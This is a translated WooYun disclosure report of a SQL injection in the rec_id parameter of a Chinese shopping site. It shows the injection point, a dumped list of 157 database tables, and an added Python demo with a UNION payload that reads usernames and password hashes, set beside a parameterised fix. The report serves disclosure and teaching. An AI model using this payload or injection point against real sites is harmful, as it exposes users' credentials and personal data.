
Vulnerability summary (followed by 24 users)

Defect ID: wooyun-2016-0169034

Title: 品牌100 main site SQL injection (380,000 user records exposed)

Vendor: 品牌100

Author: 路人甲

Submitted: 2016-01-12 12:48

Fix deadline: 2016-02-27 11:49

Public disclosure: 2016-02-27 11:49

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags: (none)

Bookmarked by 4 users


Vulnerability details

Disclosure status:

2016-01-12: details sent to the vendor, awaiting vendor handling
2016-01-15: vendor confirmed; details visible to the vendor only
2016-01-25: details opened to core white hats and domain experts
2016-02-04: details opened to regular white hats
2016-02-14: details opened to intern white hats
2016-02-27: details opened to the public

Brief description:

品牌100 SQL injection (380,000 user records exposed)

Detailed description:

Injection point (the rec_id parameter):
http://**.**.**.**/flow.php?step=calculate_cart_goods_total&rec_id=1
[*] information_schema
[*] jiewang300
Database: jiewang300
[157 tables]
+-------------------------+
| jw_account_log |
| jw_ad |
| jw_ad_custom |
| jw_ad_position |
| jw_admin_action |
| jw_admin_log |
| jw_admin_message |
| jw_admin_user |
| jw_adsense |
| jw_affiliate_log |
| jw_agency |
| jw_area_region |
| jw_article |
| jw_article_cat |
| jw_attribute |
| jw_auction_log |
| jw_auto_manage |
| jw_back_goods |
| jw_back_order |
| jw_bonus_type |
| jw_booking_goods |
| jw_brand |
| jw_brand_company |
| jw_brand_company_image |
| jw_business_card |
| jw_card |
| jw_card_pay_points |
| jw_card_points_log |
| jw_cart |
| jw_cart_tk |
| jw_cashwithdrawals |
| jw_cat_recommend |
| jw_category |
| jw_category_ydou |
| jw_city |
| jw_collect_goods |
| jw_comment |
| jw_coupons |
| jw_coupons_rule |
| jw_coupons_user |
| jw_crons |
| jw_delivery_goods |
| jw_delivery_order |
| jw_email_list |
| jw_email_sendlist |
| jw_error_log |
| jw_exchange_goods |
| jw_favourable_activity |
| jw_feedback |
| jw_finance_day |
| jw_friend_link |
| jw_goods |
| jw_goods_activity |
| jw_goods_article |
| jw_goods_attr |
| jw_goods_cat |
| jw_goods_cloud |
| jw_goods_gallery |
| jw_goods_shop |
| jw_goods_type |
| jw_group_goods |
| jw_jrzc_cat |
| jw_jrzc_comment |
| jw_jrzc_focus_log |
| jw_jrzc_plan |
| jw_jrzc_replace |
| jw_jrzc_zc |
| jw_jrzc_zc_item |
| jw_jrzc_zc_order |
| jw_keywords |
| jw_lc_jj_brand |
| jw_lc_jj_cate |
| jw_lc_jj_product |
| jw_link_goods |
| jw_mail_templates |
| jw_member_price |
| jw_mengdian |
| jw_mobile_recharge |
| jw_mobile_security_code |
| jw_nav |
| jw_order_action |
| jw_order_goods |
| jw_order_info |
| jw_order_info_tk |
| jw_order_refund |
| jw_pack |
| jw_package_goods |
| jw_param_set |
| jw_pay_log |
| jw_pay_ok_log |
| jw_paylog |
| jw_payment |
| jw_plugins |
| jw_products |
| jw_province |
| jw_red_envelopes |
| jw_red_envelopes_log |
| jw_reg_extend_info |
| jw_reg_fields |
| jw_region |
| jw_registered |
| jw_role |
| jw_searchengine |
| jw_sessions |
| jw_sessions_data |
| jw_share |
| jw_share_buy_log |
| jw_share_statistics |
| jw_sharegoods_module |
| jw_shipping |
| jw_shipping_area |
| jw_shop_config |
| jw_signin |
| jw_snatch_log |
| jw_software |
| jw_software_user |
| jw_square_queue |
| jw_stats |
| jw_suppliers |
| jw_tag |
| jw_template |
| jw_tg_tc_log |
| jw_ticheng_log |
| jw_topic |
| jw_user_account |
| jw_user_address |
| jw_user_bonus |
| jw_user_exchange |
| jw_user_exchange_log |
| jw_user_feed |
| jw_user_invite |
| jw_user_login_log |
| jw_user_param |
| jw_user_parent |
| jw_user_rank |
| jw_user_tc_log |
| jw_user_upgrade_log |
| jw_users |
| jw_users_duxian |
| jw_virtual_card |
| jw_volume_price |
| jw_vote |
| jw_vote_log |
| jw_vote_option |
| jw_wd_rank |
| jw_wholesale |
| jw_wx_menu |
| jw_wx_tpl_msg |
| jw_wxmswmp |
| jw_yd_bang |
| jw_yd_visitor |
| jw_yd_visitor_detail |
| jw_ydhb_log |
| jw_ydou_check |
| jw_ydou_goods |
| jw_yidou_act |
| jw_yifen_log |
+-------------------------+

(screenshot: CZPFD0B%VR]A_W{A3~KLV8E.png)
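The report gives only the injection point and the dumped table list; it includes neither the site's server-side code nor a fix. The block below is an added Python illustration, not code from the site or from the report: it models the bug class behind an unsanitised `rec_id` (the parameter pasted into the SQL string), shows a UNION payload that rides the two-column cart query to read `jw_users`, and sets the hardened form beside it. The table names `jw_cart` and `jw_users` are taken from the dump (whose layout is consistent with an ECShop-derived schema under a `jw_` prefix, an inference the report does not state); the column names, sample rows and hash values are constructed for the example.

```python
"""Vulnerable vs. hardened handling of rec_id, modelled on the reported
injection point flow.php?step=calculate_cart_goods_total&rec_id=1.

Added example, not the site's code. Table names jw_cart and jw_users come
from the dump in the report; columns and rows below are constructed.
"""
import re
import sqlite3


def build_db():
    """Constructed sample data (fake values) in an in-memory SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE jw_cart (
            rec_id INTEGER PRIMARY KEY,
            goods_name TEXT,
            goods_price INTEGER,   -- assumed: price stored in cents
            goods_number INTEGER
        );
        CREATE TABLE jw_users (
            user_id INTEGER PRIMARY KEY,
            user_name TEXT,
            email TEXT,
            password TEXT          -- assumed: unsalted MD5, common in older shop software
        );
        INSERT INTO jw_cart VALUES (1, 'demo goods', 990, 2);
        INSERT INTO jw_users VALUES
            (1, 'alice', 'alice@example.invalid', '5f4dcc3b5aa765d61d8327deb882cf99'),
            (2, 'bob',   'bob@example.invalid',   'e10adc3949ba59abbe56e057f20f883e');
        """
    )
    return conn


def cart_total_vulnerable(conn, rec_id):
    """The bug class: rec_id is concatenated into the SQL string unchanged,
    so a value such as '1 UNION SELECT ...' rewrites the whole query."""
    sql = ("SELECT goods_name, goods_price * goods_number "
           "FROM jw_cart WHERE rec_id = " + rec_id)
    return conn.execute(sql).fetchall()


def cart_total_hardened(conn, rec_id):
    """Validate the type first (ASCII digits only), then bind the value as a
    parameter so it can only be compared to rec_id, never parsed as SQL."""
    if not isinstance(rec_id, str) or not re.fullmatch(r"[0-9]+", rec_id):
        raise ValueError("rec_id must be a decimal integer")
    sql = ("SELECT goods_name, goods_price * goods_number "
           "FROM jw_cart WHERE rec_id = ?")
    return conn.execute(sql, (int(rec_id),)).fetchall()


# UNION payload: two columns to match the cart SELECT, reading the users table.
PAYLOAD = "1 UNION ALL SELECT user_name, password FROM jw_users"


def run_demo():
    """Run both versions against a legitimate value and against PAYLOAD.
    Returns a dict so the outcome can be checked programmatically."""
    conn = build_db()
    try:
        cart_total_hardened(conn, PAYLOAD)
        hardened_blocks_payload = False
    except ValueError:
        hardened_blocks_payload = True
    return {
        "vulnerable_legit": cart_total_vulnerable(conn, "1"),
        "vulnerable_payload": cart_total_vulnerable(conn, PAYLOAD),
        "hardened_legit": cart_total_hardened(conn, "1"),
        "hardened_blocks_payload": hardened_blocks_payload,
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, "->", value)
```

With the vulnerable builder the payload returns the cart row followed by every `user_name`/`password` pair; the hardened builder rejects it before any SQL is built. In the PHP the site most likely runs, the equivalent minimal fix is casting the parameter (`intval($_GET['rec_id'])`) before it reaches the query, or better, a prepared statement with the value bound. The dump explains the report's "user records exposed" framing: `jw_users`, `jw_admin_user`, `jw_user_login_log`, `jw_user_address` and `jw_mobile_security_code` are all readable through the same UNION once the injection is confirmed.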

Proof of vulnerability: (the same injection point and table listing as in the detailed description above)


Fix recommendation: (none given)

Copyright notice: when reposting, please credit 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2016-01-15 16:56

Vendor reply:

CNVD has not directly reproduced the reported issue and has not yet established a direct handling channel with the organisation that operates the site; awaiting claim.

Latest status:

None